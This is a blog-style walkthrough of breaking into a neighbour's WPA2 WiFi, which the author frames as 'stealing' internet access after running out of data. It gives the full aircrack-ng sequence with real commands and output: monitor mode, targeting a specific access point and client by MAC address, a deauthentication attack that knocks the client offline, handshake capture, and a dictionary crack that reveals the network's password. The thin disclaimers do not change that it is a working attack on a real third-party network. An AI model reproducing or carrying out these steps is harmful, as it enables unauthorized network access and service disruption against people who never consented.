#
This article is for technical learning and communication only. Please do not casually target your neighbors.
Preparation#
You will need the following materials:
- A wireless network card device that supports monitoring
- A powerful WiFi dictionary
- A place with WiFi
Recently, I ran out of data and thought about trying to steal some WiFi. I checked the WiFi layout around me..
There are still some WiFi devices, so I started to see if I could get one.
Technical Principles#
WiFi Authentication#
As we all know, WiFi roughly has four supported formats:
- No security
- WEP
- WPA/WPA2-PSK
- WPA/WPA2 802.1X (radius authentication)
Generally, we set the third type.
WPA-PSK Authentication Process#
- The wireless AP periodically sends beacon packets to update the wireless terminal's wireless network list.
- The wireless terminal broadcasts ProbeRequest on each channel (1-13) (non-hidden type WiFi contains ESSID, hidden type WiFi does not contain ESSID).
- Each channel's AP responds with ProbeResponse, containing ESSID and RSN information.
- The wireless terminal sends an AUTH packet to the target AP. There are two types of AUTH authentication: 0 for open, 1 for shared (WPA/WPA2 must be open).
- The AP responds to the network card's AUTH packet.
- The wireless terminal sends an association request packet to the AP.
- The AP sends an association response packet to the wireless terminal.
- EAPOL four-way handshake for authentication (the handshake packet is the key to cracking).
- Authentication is completed, and internet access is available.
WPA-PSK Four-Way Handshake Authentication Process#
WPA-PSK Cracking Principle#
Using the PSK+ssid from our dictionary to generate PMK (this step is the most time-consuming and is currently the bottleneck of cracking), then combining the client MAC from the handshake packet, the AP's BSSID, A-NONCE, and S-NONCE to calculate PTK, and then using the original message data to calculate MIC and compare it with the MIC sent by the AP. If they match, then the PSK is the key.
As shown in the figure:
So the method is still to brute-force the handshake packet to obtain the password. Since the WiFi password is cracked through brute force, you need to download some powerful dictionaries, which can be searched directly on GitHub or simply googled.
Start Stealing#
Start the Network Card#
I am using Kali, and when inserting the wireless network card, please select to connect to the virtual machine.
ifconfig -a / This command checks all network devices
If your connection is correct, there should be a network card device named wlan0
.
Next, use the command to activate this network card. If there is no output, it means it has been successfully activated.
ifconfig wlan0 up
Activate the Network Card in Monitor Mode#
airmon-ng start wlan0
At the same time, your wireless network card should have indicator lights or similar lighting up (check the model to see if it has been successfully enabled based on the results in the image).
The device name in monitor mode is wlan0mon, please remember this name for later use.
Detect Surrounding Wireless Networks#
I am currently connected to my mobile hotspot. After inserting the wireless network card, I will start sniffing the surrounding WiFi devices.
airodump-ng wlan0mon
Check the information of the surrounding router APs.
From personal experience, generally, a signal strength greater than -70 can be cracked, greater than -60 is best, and less than -70 is unstable with a weak signal. (The smaller the absolute value of the signal strength, the stronger the signal).
Here we will attack the WiFi "You Walk Old Hot Pot," so we need to record the corresponding BSSID
and CH
. These two values are the unique identifier of the WiFi and the channel, respectively. It is recommended to choose WiFi with a smaller PWR
value, as this indicates a better signal.
If you want to understand what these parameters are, I will attach two images from the internet:
Select the WiFi to Crack and Target for Handshake Capture#
airodump-ng wlan0mon -c 7 --bssid 14:75:90:9E:29:8E
The -c
parameter represents the channel number, and --bssid
represents the unique identifier of this WiFi.
After executing, wait for a while, and the output result is as follows:
fundamental CH 7 ][ Elapsed: 6 s ][ 2021-04-07 23:41
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:75:90:9E:29:8E -37 1 89 4294 299 11 270 WPA2 CCMP PSK 203
BSSID STATION PWR Rate Lost Frames Notes Probes
14:75:90:9E:29:8E 48:7D:2E:B3:04:DF -29 0 - 1e 0 7
14:75:90:9E:29:8E E0:DC:FF:DC:5A:89 -40 0 - 0e 817 4259
14:75:90:9E:29:8E 80:ED:2C:10:0D:8A -63 0 -24 0 2
14:75:90:9E:29:8E FA:83:C4:C0:8F:DF -60 0e-24 88 88
From this output, we can analyze the data:
- There are currently 4 devices connected to this WiFi, along with each device's unique identifier, packet count, etc. The next four lines represent the four devices, and we need to record the device identifier where
Lost
has changed. Here we choose the identifierE0:DC:FF:DC:5A:89
.
Okay, we currently have a few useful pieces of information as follows:
WiFi unique identifier 14:75:90:9E:29:8E
Identifier of one of the devices connected to WiFi E0:DC:FF:DC:5A:89
WiFi channel 11
Listen for Handshake Packets#
Next, we need to capture packets based on the above information and try to obtain the handshake packet containing the key.
airodump-ng wlan0mon --bssid 14:75:90:9E:29:8E -c 11 -w 203
Parameter explanation: -w saves the packet file name –c channel –bssid AP's MAC address (note that test.cap will be renamed), you can also use other tools to capture packets like: wireshark, tcpdump, capturing the handshake packet will have prompts.
airodump-ng --ivs --bssid E6:9A:DC:79:7:EC -w longas -c 1 wlan0mon**
PS: I recommend using this command for listening, –ivs here is set to filter, not to save all wireless data, but only to save IVS data packets that can be used for cracking, which can effectively reduce the size of saved packets. If you listen according to the first statement without filtering requests, there will be many extra requests, and I will use this command for demonstration in the subsequent images.
When listening, if a device logs in successfully, the handshake packet will be captured. However, at this time, the client may not necessarily send a login packet to the server. How to capture this packet with the authentication request? It's simple, forcibly disconnect the client.
Execute Deauthentication Attack to Obtain Handshake Packet#
Next, we need to use Aireplay-ng
to perform a deauthentication attack. When the user reconnects to WiFi, Airodump-ng
should be able to capture the packet containing the key.
aireplay-ng wlan0mon -0 10 -a 14:75:90:9E:29:8E -c E0:DC:FF:DC:5A:89
Here, -0
represents the number of attacks, the following 10 is the number of attacks, -a
represents the WiFi to be attacked, and -c
represents the device connected to the WiFi to be attacked.
The output result of this command is as follows:
fundamental 23:55:26 Waiting for beacon frame (BSSID: 14:75:90:9E:29:8E) on channel 11
23:55:28 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [27| 1 ACKs]
23:55:29 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 3| 1 ACKs]
23:55:30 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 2| 6 ACKs]
23:55:32 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 8| 7 ACKs]
23:55:34 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 7| 7 ACKs]
23:55:36 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 7|14 ACKs]
23:55:39 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [34| 3 ACKs]
23:55:41 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [22| 6 ACKs]
23:55:43 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [ 5| 5 ACKs]
23:55:45 Sending 64 directed DeAuth (code 7). STMAC: [E0:DC:FF:DC:5A:89] [10| 6 ACKs]
If this method fails multiple times, you can try removing the -c
parameter to perform a range attack on each device, which will also increase the chances of capturing the encrypted packet.
When airodump-ng
prompts that it has captured the WPA handshake
, it means that the encrypted handshake packet has been obtained, and there is no need for a deauthentication attack anymore.
In practice, I used to disconnect the entire client to make them reconnect.
When the shell here prompts WPA handshake
, it indicates that the handshake packet has been obtained, and you can stop.
CH 11 ][ Elapsed: 6 mins ][ 2021-04-08 00:05 ][ WPA handshake: 14:75:90:9E:29:8E
Dictionary Cracking#
Next, we will use the prepared dictionary and the obtained handshake packet for brute-force cracking.
Execute the following command to crack:
aircrack-ng -w common.txt 203.ivs
-w
is our dictionary, and 203-01.cap
is the key handshake packet we obtained.
I was lucky, and the password was relatively simple.
KEY FOUND! [ 99998888 ] is the password.
Finally#
Please treat your neighbors well and do not casually target them.